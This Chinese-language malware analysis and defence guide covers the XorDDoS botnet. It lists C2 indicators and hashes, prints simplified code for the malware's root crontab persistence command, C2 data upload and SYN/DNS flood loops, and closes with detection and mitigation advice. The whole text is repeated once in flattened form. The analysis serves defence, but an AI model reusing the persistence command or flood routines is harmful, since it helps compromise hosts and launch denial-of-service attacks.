中国香港地区 DDoS-botnet 分析报告
字数 1745 2025-08-20 18:17:42

XorDDoS-botnet分析与防御指南

一、概述

XorDDoS-botnet是一种活跃于中国香港地区的DDoS僵尸网络,自2017年11月开始活动,持续至今。该僵尸网络通过爆破和利用JAVA Struts漏洞感染主机,并通过添加自启动服务和安装RootKit驱动实现持久化驻留。其主要特征包括:

  • 中控域名:jun6.f3322.net
  • 中控服务器IP:118.184.43.7(中国香港)
  • 主要攻击类型:SYN攻击和DNS攻击
  • 攻击规模:肉鸡数量曾达到顶峰,攻击流量可达500G至1T级别

二、样本技术分析

1. 样本基本信息

字段 内容
木马类型 XorDDoS木马
原始文件名 rnpgrcoywx
MD5 f46a3392c3887250aeaa7d23d8de704a
SHA256 d5e132cdf32bef6bb58dd043a6c4abd25f9addfe2c0c7335fd822e98bfeed1cd
处理器架构 Intel 80386
文件大小 647.3 KB
文件格式 ELF 32-bit LSB executable
VT首次上传时间 2018-04-07 23:14:47
VT检测结果 41 / 59

2. 持久化机制

自启动服务添加代码

// 添加自启动服务
system("echo \"@reboot /tmp/.ICE-unix/rnpgrcoywx\" >> /var/spool/cron/crontabs/root");

RootKit驱动隐藏技术

// 隐藏进程网络端口
if(rootkit_exists()) {
    send_command(0x9748712); // 隐藏端口指令
}

3. 通信机制

中控域名解密

// 解密中控域名
char* decrypt_c2_domain() {
    char encrypted[] = {0x12, 0x34, 0x56, ...}; // 加密数据
    for(int i=0; i<sizeof(encrypted); i++) {
        encrypted[i] ^= 0x55; // 简单异或解密
    }
    return encrypted; // 返回jun6.f3322.net
}

系统信息收集

// 上传肉鸡信息
void upload_victim_info() {
    get_cpu_info();
    get_mem_info();
    get_bandwidth();
    send_to_c2(server_ip, collected_data);
}

4. 攻击模块

SYN攻击实现

void syn_flood(target_ip, target_port) {
    while(1) {
        send_syn_packet(random_source_ip(), target_ip, target_port);
    }
}

DNS攻击实现

void dns_amplification(dns_server, target_ip) {
    craft_dns_query(dns_server);
    send_to_target(target_ip, amplified_response);
}

三、僵尸网络发展分析

1. 肉鸡规模变化趋势

  • 2017年11月:初始感染阶段
  • 2018年2月:肉鸡数量达到小高峰
  • 2018年4月:达到顶峰规模
  • 持续9个月活跃,攻击全球多个地区

2. 受害者地理分布

  • 覆盖中国25个省区
  • 中国香港地区受害用户数排名第二
  • 全球范围内均有受害者

四、香港地区DDoS黑产现状

1. 整体情况

  • 占全国DDoS肉鸡总量的2%-3%
  • 攻击类型丰富,达十几种
  • XorDDoS家族占比最高
  • 攻击流量范围:1G至1T

2. 详细统计

中控数量趋势

  • 2018年初至今持续攀升

木马家族分布

  • XorDDoS家族
  • Gates家族
  • Mayday家族
  • 其他家族

攻击类型分布

  • SYN Flood
  • DNS放大攻击
  • HTTP Flood
  • NTP放大攻击
  • Memcache放大攻击
  • 其他反射型攻击

攻击流量分布

  • 1G-10G:10%
  • 10G-100G:40%
  • 100G-500G:40%
  • 500G-1T:10%

五、防御建议

1. 基础防护措施

  1. 系统加固

    • 及时安装系统补丁,特别是JAVA Struts等常见漏洞
    • 关闭不必要的服务和端口
    • 定期检查系统异常进程和服务

  2. 网络防护

    • 部署防火墙,配置合理的ACL规则
    • 启用SYN Cookie防护
    • 限制DNS、NTP等服务的递归查询

  3. 监控与检测

    • 部署入侵检测系统(IDS)
    • 监控异常流量模式
    • 建立基线流量模型,检测异常

2. 企业级防护方案

  1. 分布式部署

    • 采用集群架构分散风险
    • 实现负载均衡和自动故障转移

  2. 专业防护服务

    • 使用云防护服务如阿里云Anti-DDoS
    • 考虑部署WAF防护应用层攻击
    • 启用流量清洗服务

  3. 应急响应

    • 制定DDoS应急响应预案
    • 建立与ISP的应急联系通道
    • 定期进行抗D演练

3. 针对XorDDoS的专项检测

  1. 检测指标

    • 检查crontab中异常任务
    • 监控/tmp/.ICE-unix/等临时目录
    • 检测异常网络连接(特别是118.184.43.7)

  2. 清除方法

    • 删除恶意cron任务
    • 清除RootKit驱动
    • 检查并删除持久化项目
    • 全盘扫描清除恶意文件

六、总结

XorDDoS-botnet代表了现代DDoS僵尸网络的典型特征:持久化驻留、隐蔽通信、多样化攻击手段。香港地区的DDoS黑产呈现出攻击规模大、技术先进的特点。企业应建立多层次防御体系,从预防、检测、缓解三个维度构建完整防护方案,特别是针对反射放大攻击等新型威胁。云防护服务因其弹性防护能力和专业安全团队支持,成为对抗大规模DDoS攻击的有效选择。

XorDDoS-botnet分析与防御指南 一、概述 XorDDoS-botnet是一种活跃于中国香港地区的DDoS僵尸网络,自2017年11月开始活动,持续至今。该僵尸网络通过爆破和利用JAVA Struts漏洞感染主机,并通过添加自启动服务和安装RootKit驱动实现持久化驻留。其主要特征包括: 中控域名:jun6.f3322.net 中控服务器IP:118.184.43.7(中国香港) 主要攻击类型:SYN攻击和DNS攻击 攻击规模:肉鸡数量曾达到顶峰,攻击流量可达500G至1T级别 二、样本技术分析 1. 样本基本信息 | 字段 | 内容 | |------|------| | 木马类型 | XorDDoS木马 | | 原始文件名 | rnpgrcoywx | | MD5 | f46a3392c3887250aeaa7d23d8de704a | | SHA256 | d5e132cdf32bef6bb58dd043a6c4abd25f9addfe2c0c7335fd822e98bfeed1cd | | 处理器架构 | Intel 80386 | | 文件大小 | 647.3 KB | | 文件格式 | ELF 32-bit LSB executable | | VT首次上传时间 | 2018-04-07 23:14:47 | | VT检测结果 | 41 / 59 | 2. 持久化机制 自启动服务添加代码 : RootKit驱动隐藏技术 : 3. 通信机制 中控域名解密 : 系统信息收集 : 4. 攻击模块 SYN攻击实现 : DNS攻击实现 : 三、僵尸网络发展分析 1. 肉鸡规模变化趋势 2017年11月:初始感染阶段 2018年2月:肉鸡数量达到小高峰 2018年4月:达到顶峰规模 持续9个月活跃,攻击全球多个地区 2. 受害者地理分布 覆盖中国25个省区 中国香港地区受害用户数排名第二 全球范围内均有受害者 四、香港地区DDoS黑产现状 1. 整体情况 占全国DDoS肉鸡总量的2%-3% 攻击类型丰富,达十几种 XorDDoS家族占比最高 攻击流量范围:1G至1T 2. 详细统计 中控数量趋势 : 2018年初至今持续攀升 木马家族分布 : XorDDoS家族 Gates家族 Mayday家族 其他家族 攻击类型分布 : SYN Flood DNS放大攻击 HTTP Flood NTP放大攻击 Memcache放大攻击 其他反射型攻击 攻击流量分布 : 1G-10G:10% 10G-100G:40% 100G-500G:40% 500G-1T:10% 五、防御建议 1. 基础防护措施 系统加固 : 及时安装系统补丁,特别是JAVA Struts等常见漏洞 关闭不必要的服务和端口 定期检查系统异常进程和服务 网络防护 : 部署防火墙,配置合理的ACL规则 启用SYN Cookie防护 限制DNS、NTP等服务的递归查询 监控与检测 : 部署入侵检测系统(IDS) 监控异常流量模式 建立基线流量模型,检测异常 2. 企业级防护方案 分布式部署 : 采用集群架构分散风险 实现负载均衡和自动故障转移 专业防护服务 : 使用云防护服务如阿里云Anti-DDoS 考虑部署WAF防护应用层攻击 启用流量清洗服务 应急响应 : 制定DDoS应急响应预案 建立与ISP的应急联系通道 定期进行抗D演练 3. 针对XorDDoS的专项检测 检测指标 : 检查crontab中异常任务 监控/tmp/.ICE-unix/等临时目录 检测异常网络连接(特别是118.184.43.7) 清除方法 : 删除恶意cron任务 清除RootKit驱动 检查并删除持久化项目 全盘扫描清除恶意文件 六、总结 XorDDoS-botnet代表了现代DDoS僵尸网络的典型特征:持久化驻留、隐蔽通信、多样化攻击手段。香港地区的DDoS黑产呈现出攻击规模大、技术先进的特点。企业应建立多层次防御体系,从预防、检测、缓解三个维度构建完整防护方案,特别是针对反射放大攻击等新型威胁。云防护服务因其弹性防护能力和专业安全团队支持,成为对抗大规模DDoS攻击的有效选择。